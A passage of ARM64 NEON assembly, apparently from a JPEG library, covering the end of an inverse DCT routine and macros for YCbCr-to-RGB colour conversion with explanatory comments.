/* Final output stage: inputs are tmp10..tmp13, tmp0..tmp3 */
add v18.4s, v2.4s, v16.4s /* tmp10 + tmp3 */
sub v20.4s, v2.4s, v16.4s /* tmp10 - tmp3 */
add v22.4s, v8.4s, v14.4s /* tmp11 + tmp2 */
sub v24.4s, v8.4s, v14.4s /* tmp11 - tmp2 */
add v26.4s, v4.4s, v12.4s /* tmp12 + tmp1 */
sub v28.4s, v4.4s, v12.4s /* tmp12 - tmp1 */
add v14.4s, v6.4s, v10.4s /* tmp13 + tmp0 */
sub v16.4s, v6.4s, v10.4s /* tmp13 - tmp0 */
rshrn v2.4h, v18.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS-PASS1_BITS) */
rshrn v3.4h, v22.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS-PASS1_BITS) */
rshrn v4.4h, v26.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS-PASS1_BITS) */
rshrn v5.4h, v14.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v2.8h, v16.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v3.8h, v28.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS-PASS1_BITS) */
rshrn2 v4.8h, v24.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS-PASS1_BITS) */
rshrn2 v5.8h, v20.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS-PASS1_BITS) */
mov v6.16b, v15.16b
mov v7.16b, v15.16b
mov v8.16b, v15.16b
mov v9.16b, v15.16b
b 1b
.balign 16
3:
cbnz TMP4, 4f
/* Left AC coef is zero */
dup v14.2d, v10.d[0]
/* Even part: reverse the even part of the forward DCT. */
add v18.8h, v4.8h, v8.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*2], quantptr[DCTSIZE*2]) + DEQUANTIZE(inptr[DCTSIZE*6], quantptr[DCTSIZE*6]) */
add v22.8h, v2.8h, v6.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) + DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull2 v19.4s, v18.8h, XFIX_P_0_541 /* z1h z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sub v26.8h, v2.8h, v6.8h /* z2 - z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) - DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
sshll2 v23.4s, v22.8h, #(CONST_BITS) /* tmp0h tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
mov v21.16b, v19.16b /* tmp3 = z1 */
smlal2 v19.4s, v8.8h, XFIX_N_1_847 /* tmp2h tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
sshll2 v27.4s, v26.8h, #(CONST_BITS) /* tmp1h tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
smlal2 v21.4s, v4.8h, XFIX_P_0_765 /* tmp3h tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
add v28.4s, v23.4s, v21.4s /* tmp10h tmp10 = tmp0 + tmp3; */
sub v31.4s, v23.4s, v21.4s /* tmp13h tmp13 = tmp0 - tmp3; */
add v29.4s, v27.4s, v19.4s /* tmp11h tmp11 = tmp1 + tmp2; */
sub v30.4s, v27.4s, v19.4s /* tmp12h tmp12 = tmp1 - tmp2; */
/* Odd part per figure 8; the matrix is unitary and hence its
* transpose is its inverse. i0..i3 are y7,y5,y3,y1 respectively.
*/
add v22.8h, v9.8h, v5.8h /* z3 = tmp0 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v24.8h, v7.8h, v3.8h /* z4 = tmp1 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v18.8h, v9.8h, v3.8h /* z1 = tmp0 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v20.8h, v7.8h, v5.8h /* z2 = tmp1 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v26.8h, v22.8h, v24.8h /* z5 = z3 + z4 */
smull2 v11.4s, v9.8h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull2 v13.4s, v7.8h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull2 v15.4s, v5.8h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull2 v17.4s, v3.8h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull2 v27.4s, v26.8h, XFIX_P_1_175 /* z5h z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull2 v23.4s, v22.8h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull2 v25.4s, v24.8h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull2 v19.4s, v18.8h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull2 v21.4s, v20.8h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
add v23.4s, v23.4s, v27.4s /* z3 += z5 */
add v22.4s, v22.4s, v26.4s /* z3 += z5 */
add v25.4s, v25.4s, v27.4s /* z4 += z5 */
add v24.4s, v24.4s, v26.4s /* z4 += z5 */
add v11.4s, v11.4s, v19.4s /* tmp0 += z1 */
add v13.4s, v13.4s, v21.4s /* tmp1 += z2 */
add v15.4s, v15.4s, v21.4s /* tmp2 += z2 */
add v17.4s, v17.4s, v19.4s /* tmp3 += z1 */
add v11.4s, v11.4s, v23.4s /* tmp0 += z3 */
add v13.4s, v13.4s, v25.4s /* tmp1 += z4 */
add v17.4s, v17.4s, v25.4s /* tmp3 += z4 */
add v15.4s, v15.4s, v23.4s /* tmp2 += z3 */
/* Final output stage: inputs are tmp10..tmp13, tmp0..tmp3 */
add v19.4s, v28.4s, v17.4s /* tmp10 + tmp3 */
sub v21.4s, v28.4s, v17.4s /* tmp10 - tmp3 */
add v23.4s, v29.4s, v15.4s /* tmp11 + tmp2 */
sub v25.4s, v29.4s, v15.4s /* tmp11 - tmp2 */
add v27.4s, v30.4s, v13.4s /* tmp12 + tmp1 */
sub v29.4s, v30.4s, v13.4s /* tmp12 - tmp1 */
add v15.4s, v31.4s, v11.4s /* tmp13 + tmp0 */
sub v17.4s, v31.4s, v11.4s /* tmp13 - tmp0 */
mov v2.16b, v14.16b
mov v3.16b, v14.16b
mov v4.16b, v14.16b
mov v5.16b, v14.16b
rshrn v6.4h, v19.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS-PASS1_BITS) */
rshrn v7.4h, v23.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS-PASS1_BITS) */
rshrn v8.4h, v27.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS-PASS1_BITS) */
rshrn v9.4h, v15.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v6.8h, v17.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v7.8h, v29.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS-PASS1_BITS) */
rshrn2 v8.8h, v25.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS-PASS1_BITS) */
rshrn2 v9.8h, v21.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS-PASS1_BITS) */
b 1b
.balign 16
4:
/* "No" AC coef is zero */
/* Even part: reverse the even part of the forward DCT. */
add v18.8h, v4.8h, v8.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*2], quantptr[DCTSIZE*2]) + DEQUANTIZE(inptr[DCTSIZE*6], quantptr[DCTSIZE*6]) */
add v22.8h, v2.8h, v6.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) + DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull2 v19.4s, v18.8h, XFIX_P_0_541 /* z1h z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sub v26.8h, v2.8h, v6.8h /* z2 - z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) - DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull v18.4s, v18.4h, XFIX_P_0_541 /* z1l z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sshll2 v23.4s, v22.8h, #(CONST_BITS) /* tmp0h tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
mov v21.16b, v19.16b /* tmp3 = z1 */
mov v20.16b, v18.16b /* tmp3 = z1 */
smlal2 v19.4s, v8.8h, XFIX_N_1_847 /* tmp2h tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
smlal v18.4s, v8.4h, XFIX_N_1_847 /* tmp2l tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
sshll2 v27.4s, v26.8h, #(CONST_BITS) /* tmp1h tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
smlal2 v21.4s, v4.8h, XFIX_P_0_765 /* tmp3h tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
smlal v20.4s, v4.4h, XFIX_P_0_765 /* tmp3l tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
sshll v22.4s, v22.4h, #(CONST_BITS) /* tmp0l tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
sshll v26.4s, v26.4h, #(CONST_BITS) /* tmp1l tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
add v2.4s, v22.4s, v20.4s /* tmp10l tmp10 = tmp0 + tmp3; */
sub v6.4s, v22.4s, v20.4s /* tmp13l tmp13 = tmp0 - tmp3; */
add v8.4s, v26.4s, v18.4s /* tmp11l tmp11 = tmp1 + tmp2; */
sub v4.4s, v26.4s, v18.4s /* tmp12l tmp12 = tmp1 - tmp2; */
add v28.4s, v23.4s, v21.4s /* tmp10h tmp10 = tmp0 + tmp3; */
sub v31.4s, v23.4s, v21.4s /* tmp13h tmp13 = tmp0 - tmp3; */
add v29.4s, v27.4s, v19.4s /* tmp11h tmp11 = tmp1 + tmp2; */
sub v30.4s, v27.4s, v19.4s /* tmp12h tmp12 = tmp1 - tmp2; */
/* Odd part per figure 8; the matrix is unitary and hence its
* transpose is its inverse. i0..i3 are y7,y5,y3,y1 respectively.
*/
add v22.8h, v9.8h, v5.8h /* z3 = tmp0 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v24.8h, v7.8h, v3.8h /* z4 = tmp1 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v18.8h, v9.8h, v3.8h /* z1 = tmp0 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v20.8h, v7.8h, v5.8h /* z2 = tmp1 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v26.8h, v22.8h, v24.8h /* z5 = z3 + z4 */
smull2 v11.4s, v9.8h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull2 v13.4s, v7.8h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull2 v15.4s, v5.8h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull2 v17.4s, v3.8h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull2 v27.4s, v26.8h, XFIX_P_1_175 /* z5h z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull2 v23.4s, v22.8h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull2 v25.4s, v24.8h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull2 v19.4s, v18.8h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull2 v21.4s, v20.8h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
smull v10.4s, v9.4h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull v12.4s, v7.4h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull v14.4s, v5.4h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull v16.4s, v3.4h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull v26.4s, v26.4h, XFIX_P_1_175 /* z5l z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull v22.4s, v22.4h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull v24.4s, v24.4h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull v18.4s, v18.4h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull v20.4s, v20.4h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
add v23.4s, v23.4s, v27.4s /* z3 += z5 */
add v22.4s, v22.4s, v26.4s /* z3 += z5 */
add v25.4s, v25.4s, v27.4s /* z4 += z5 */
add v24.4s, v24.4s, v26.4s /* z4 += z5 */
add v11.4s, v11.4s, v19.4s /* tmp0 += z1 */
add v10.4s, v10.4s, v18.4s /* tmp0 += z1 */
add v13.4s, v13.4s, v21.4s /* tmp1 += z2 */
add v12.4s, v12.4s, v20.4s /* tmp1 += z2 */
add v15.4s, v15.4s, v21.4s /* tmp2 += z2 */
add v14.4s, v14.4s, v20.4s /* tmp2 += z2 */
add v17.4s, v17.4s, v19.4s /* tmp3 += z1 */
add v16.4s, v16.4s, v18.4s /* tmp3 += z1 */
add v11.4s, v11.4s, v23.4s /* tmp0 += z3 */
add v10.4s, v10.4s, v22.4s /* tmp0 += z3 */
add v13.4s, v13.4s, v25.4s /* tmp1 += z4 */
add v12.4s, v12.4s, v24.4s /* tmp1 += z4 */
add v17.4s, v17.4s, v25.4s /* tmp3 += z4 */
add v16.4s, v16.4s, v24.4s /* tmp3 += z4 */
add v15.4s, v15.4s, v23.4s /* tmp2 += z3 */
add v14.4s, v14.4s, v22.4s /* tmp2 += z3 */
/* Final output stage: inputs are tmp10..tmp13, tmp0..tmp3 */
add v18.4s, v2.4s, v16.4s /* tmp10 + tmp3 */
add v19.4s, v28.4s, v17.4s /* tmp10 + tmp3 */
sub v20.4s, v2.4s, v16.4s /* tmp10 - tmp3 */
sub v21.4s, v28.4s, v17.4s /* tmp10 - tmp3 */
add v22.4s, v8.4s, v14.4s /* tmp11 + tmp2 */
add v23.4s, v29.4s, v15.4s /* tmp11 + tmp2 */
sub v24.4s, v8.4s, v14.4s /* tmp11 - tmp2 */
sub v25.4s, v29.4s, v15.4s /* tmp11 - tmp2 */
add v26.4s, v4.4s, v12.4s /* tmp12 + tmp1 */
add v27.4s, v30.4s, v13.4s /* tmp12 + tmp1 */
sub v28.4s, v4.4s, v12.4s /* tmp12 - tmp1 */
sub v29.4s, v30.4s, v13.4s /* tmp12 - tmp1 */
add v14.4s, v6.4s, v10.4s /* tmp13 + tmp0 */
add v15.4s, v31.4s, v11.4s /* tmp13 + tmp0 */
sub v16.4s, v6.4s, v10.4s /* tmp13 - tmp0 */
sub v17.4s, v31.4s, v11.4s /* tmp13 - tmp0 */
rshrn v2.4h, v18.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS-PASS1_BITS) */
rshrn v3.4h, v22.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS-PASS1_BITS) */
rshrn v4.4h, v26.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS-PASS1_BITS) */
rshrn v5.4h, v14.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS-PASS1_BITS) */
rshrn v6.4h, v19.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS-PASS1_BITS) */
rshrn v7.4h, v23.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS-PASS1_BITS) */
rshrn v8.4h, v27.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS-PASS1_BITS) */
rshrn v9.4h, v15.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v2.8h, v16.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v3.8h, v28.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS-PASS1_BITS) */
rshrn2 v4.8h, v24.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS-PASS1_BITS) */
rshrn2 v5.8h, v20.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS-PASS1_BITS) */
rshrn2 v6.8h, v17.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v7.8h, v29.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS-PASS1_BITS) */
rshrn2 v8.8h, v25.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS-PASS1_BITS) */
rshrn2 v9.8h, v21.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS-PASS1_BITS) */
b 1b
.unreq DCT_TABLE
.unreq COEF_BLOCK
.unreq OUTPUT_BUF
.unreq OUTPUT_COL
.unreq TMP1
.unreq TMP2
.unreq TMP3
.unreq TMP4
.unreq TMP5
.unreq TMP6
.unreq TMP7
.unreq TMP8
#undef CENTERJSAMPLE
#undef CONST_BITS
#undef PASS1_BITS
#undef XFIX_P_0_298
#undef XFIX_N_0_390
#undef XFIX_P_0_541
#undef XFIX_P_0_765
#undef XFIX_N_0_899
#undef XFIX_P_1_175
#undef XFIX_P_1_501
#undef XFIX_N_1_847
#undef XFIX_N_1_961
#undef XFIX_P_2_053
#undef XFIX_N_2_562
#undef XFIX_P_3_072
/*****************************************************************************/
/*
* jsimd_ycc_extrgb_convert_neon
* jsimd_ycc_extbgr_convert_neon
* jsimd_ycc_extrgbx_convert_neon
* jsimd_ycc_extbgrx_convert_neon
* jsimd_ycc_extxbgr_convert_neon
* jsimd_ycc_extxrgb_convert_neon
*
* Colorspace conversion YCbCr -> RGB
*/
/*
 * do_load size
 *
 * Load one chunk of Y/Cb/Cr samples for the YCbCr->RGB converter.
 * Y, U, V are register aliases (bound inside the enclosing function
 * macro) holding the luma and chroma row pointers; each pointer is
 * post-incremented by the number of bytes consumed.
 *
 * size == 8 fills lanes 0-7 of v0 (Y), v4 (Cb), v5 (Cr) with a single
 * vector load per plane and prefetches ahead.  The 4/2/1 variants fill
 * lanes 0-3, 4-5 and 6 respectively, so the tail handlers can be
 * chained to cover any residual width up to 7 pixels (4+2+1).
 */
.macro do_load size
.if \size == 8
ld1 {v4.8b}, [U], 8
ld1 {v5.8b}, [V], 8
ld1 {v0.8b}, [Y], 8
prfm pldl1keep, [U, #64]
prfm pldl1keep, [V, #64]
prfm pldl1keep, [Y, #64]
.elseif \size == 4
/* Lane-by-lane loads: lanes 0-3 of each plane register. */
ld1 {v4.b}[0], [U], 1
ld1 {v4.b}[1], [U], 1
ld1 {v4.b}[2], [U], 1
ld1 {v4.b}[3], [U], 1
ld1 {v5.b}[0], [V], 1
ld1 {v5.b}[1], [V], 1
ld1 {v5.b}[2], [V], 1
ld1 {v5.b}[3], [V], 1
ld1 {v0.b}[0], [Y], 1
ld1 {v0.b}[1], [Y], 1
ld1 {v0.b}[2], [Y], 1
ld1 {v0.b}[3], [Y], 1
.elseif \size == 2
/* Lanes 4-5: continues after a preceding do_load 4. */
ld1 {v4.b}[4], [U], 1
ld1 {v4.b}[5], [U], 1
ld1 {v5.b}[4], [V], 1
ld1 {v5.b}[5], [V], 1
ld1 {v0.b}[4], [Y], 1
ld1 {v0.b}[5], [Y], 1
.elseif \size == 1
/* Lane 6: the final odd pixel of a partial chunk. */
ld1 {v4.b}[6], [U], 1
ld1 {v5.b}[6], [V], 1
ld1 {v0.b}[6], [Y], 1
.else
.error unsupported macroblock size
.endif
.endm
/*
 * do_store bpp, size, fast_st3
 *
 * Store one chunk of converted pixels to the interleaved RGB output
 * row.  RGB is a register alias for the output pointer and is
 * post-incremented.  The channel data lives in v10/v11/v12 (plus v13
 * for the 32-bpp X channel) or, packed, in v25 for RGB565.
 *
 * bpp selects the pixel layout (24 = 3 bytes/pixel, 32 = 4 bytes/pixel,
 * 16 = RGB565); size is the number of pixels (8/4/2/1), using the same
 * lane numbering as do_load so partial chunks compose.  fast_st3 == 0
 * replaces the interleaved st3 with byte-lane stores, presumably for
 * cores where st3 is slow -- TODO confirm against the build flags that
 * choose the *_slowst3 entry points.
 */
.macro do_store bpp, size, fast_st3
.if \bpp == 24
.if \size == 8
.if \fast_st3 == 1
/* One interleaved store writes all 24 bytes (8 x RGB). */
st3 {v10.8b, v11.8b, v12.8b}, [RGB], 24
.else
/* st3-free fallback: emit the same 24 bytes one lane at a time. */
st1 {v10.b}[0], [RGB], #1
st1 {v11.b}[0], [RGB], #1
st1 {v12.b}[0], [RGB], #1
st1 {v10.b}[1], [RGB], #1
st1 {v11.b}[1], [RGB], #1
st1 {v12.b}[1], [RGB], #1
st1 {v10.b}[2], [RGB], #1
st1 {v11.b}[2], [RGB], #1
st1 {v12.b}[2], [RGB], #1
st1 {v10.b}[3], [RGB], #1
st1 {v11.b}[3], [RGB], #1
st1 {v12.b}[3], [RGB], #1
st1 {v10.b}[4], [RGB], #1
st1 {v11.b}[4], [RGB], #1
st1 {v12.b}[4], [RGB], #1
st1 {v10.b}[5], [RGB], #1
st1 {v11.b}[5], [RGB], #1
st1 {v12.b}[5], [RGB], #1
st1 {v10.b}[6], [RGB], #1
st1 {v11.b}[6], [RGB], #1
st1 {v12.b}[6], [RGB], #1
st1 {v10.b}[7], [RGB], #1
st1 {v11.b}[7], [RGB], #1
st1 {v12.b}[7], [RGB], #1
.endif
.elseif \size == 4
st3 {v10.b, v11.b, v12.b}[0], [RGB], 3
st3 {v10.b, v11.b, v12.b}[1], [RGB], 3
st3 {v10.b, v11.b, v12.b}[2], [RGB], 3
st3 {v10.b, v11.b, v12.b}[3], [RGB], 3
.elseif \size == 2
st3 {v10.b, v11.b, v12.b}[4], [RGB], 3
st3 {v10.b, v11.b, v12.b}[5], [RGB], 3
.elseif \size == 1
st3 {v10.b, v11.b, v12.b}[6], [RGB], 3
.else
.error unsupported macroblock size
.endif
.elseif \bpp == 32
.if \size == 8
st4 {v10.8b, v11.8b, v12.8b, v13.8b}, [RGB], 32
.elseif \size == 4
st4 {v10.b, v11.b, v12.b, v13.b}[0], [RGB], 4
st4 {v10.b, v11.b, v12.b, v13.b}[1], [RGB], 4
st4 {v10.b, v11.b, v12.b, v13.b}[2], [RGB], 4
st4 {v10.b, v11.b, v12.b, v13.b}[3], [RGB], 4
.elseif \size == 2
st4 {v10.b, v11.b, v12.b, v13.b}[4], [RGB], 4
st4 {v10.b, v11.b, v12.b, v13.b}[5], [RGB], 4
.elseif \size == 1
st4 {v10.b, v11.b, v12.b, v13.b}[6], [RGB], 4
.else
.error unsupported macroblock size
.endif
.elseif \bpp == 16
/* RGB565: pixels are pre-packed into 16-bit lanes of v25. */
.if \size == 8
st1 {v25.8h}, [RGB], 16
.elseif \size == 4
st1 {v25.4h}, [RGB], 8
.elseif \size == 2
st1 {v25.h}[4], [RGB], 2
st1 {v25.h}[5], [RGB], 2
.elseif \size == 1
st1 {v25.h}[6], [RGB], 2
.else
.error unsupported macroblock size
.endif
.else
.error unsupported bpp
.endif
.endm
/*
 * generate_jsimd_ycc_rgb_convert_neon colorid, bpp, r_offs, rsize,
 *                                     g_offs, gsize, b_offs, bsize,
 *                                     defsize, fast_st3
 *
 * Emits one complete YCbCr->RGB row-conversion function,
 * jsimd_ycc_<colorid>_convert_neon (or *_slowst3 when fast_st3 == 0).
 * r_offs/g_offs/b_offs select which of v10..v13 receives each channel,
 * so a single body serves every byte order; bpp == 16 takes the
 * RGB565 packing path instead.
 *
 * C-equivalent signature (from the register bindings below):
 *   void jsimd_ycc_*_convert_neon(JDIMENSION output_width,
 *                                 JSAMPIMAGE input_buf, JDIMENSION input_row,
 *                                 JSAMPARRAY output_buf, int num_rows)
 * NOTE(review): argument names inferred from the .req aliases; confirm
 * against the C prototype in the surrounding project.
 */
.macro generate_jsimd_ycc_rgb_convert_neon colorid, bpp, r_offs, rsize, \
g_offs, gsize, b_offs, bsize, \
defsize, fast_st3
/*
 * 2-stage pipelined YCbCr->RGB conversion
 */
/*
 * Stage 1: widen Cb/Cr, subtract the 128 bias (v2 holds the bias --
 * loaded from the constants table by the function body), and start the
 * long multiplies for the chroma contributions.  Results accumulate in
 * v20/v22 (G), v24/v26 (R) and v28/v30 (B), low/high halves.
 */
.macro do_yuv_to_rgb_stage1
uaddw v6.8h, v2.8h, v4.8b /* q3 = u - 128 */
uaddw v8.8h, v2.8h, v5.8b /* q2 = v - 128 */
smull v20.4s, v6.4h, v1.h[1] /* multiply by -11277 */
smlal v20.4s, v8.4h, v1.h[2] /* multiply by -23401 */
smull2 v22.4s, v6.8h, v1.h[1] /* multiply by -11277 */
smlal2 v22.4s, v8.8h, v1.h[2] /* multiply by -23401 */
smull v24.4s, v8.4h, v1.h[0] /* multiply by 22971 */
smull2 v26.4s, v8.8h, v1.h[0] /* multiply by 22971 */
smull v28.4s, v6.4h, v1.h[3] /* multiply by 29033 */
smull2 v30.4s, v6.8h, v1.h[3] /* multiply by 29033 */
.endm
/*
 * Stage 2: descale the chroma terms, add the widened Y samples, then
 * saturate-narrow into the per-channel output registers (or pack into
 * RGB565 in v25 when bpp == 16).
 */
.macro do_yuv_to_rgb_stage2
rshrn v20.4h, v20.4s, #15
rshrn2 v20.8h, v22.4s, #15
rshrn v24.4h, v24.4s, #14
rshrn2 v24.8h, v26.4s, #14
rshrn v28.4h, v28.4s, #14
rshrn2 v28.8h, v30.4s, #14
uaddw v20.8h, v20.8h, v0.8b
uaddw v24.8h, v24.8h, v0.8b
uaddw v28.8h, v28.8h, v0.8b
.if \bpp != 16
/* v1<offs> expands to v10..v12: route each channel to its slot. */
sqxtun v1\g_offs\defsize, v20.8h
sqxtun v1\r_offs\defsize, v24.8h
sqxtun v1\b_offs\defsize, v28.8h
.else
/* RGB565: shift each channel to the top, then insert with sri. */
sqshlu v21.8h, v20.8h, #8
sqshlu v25.8h, v24.8h, #8
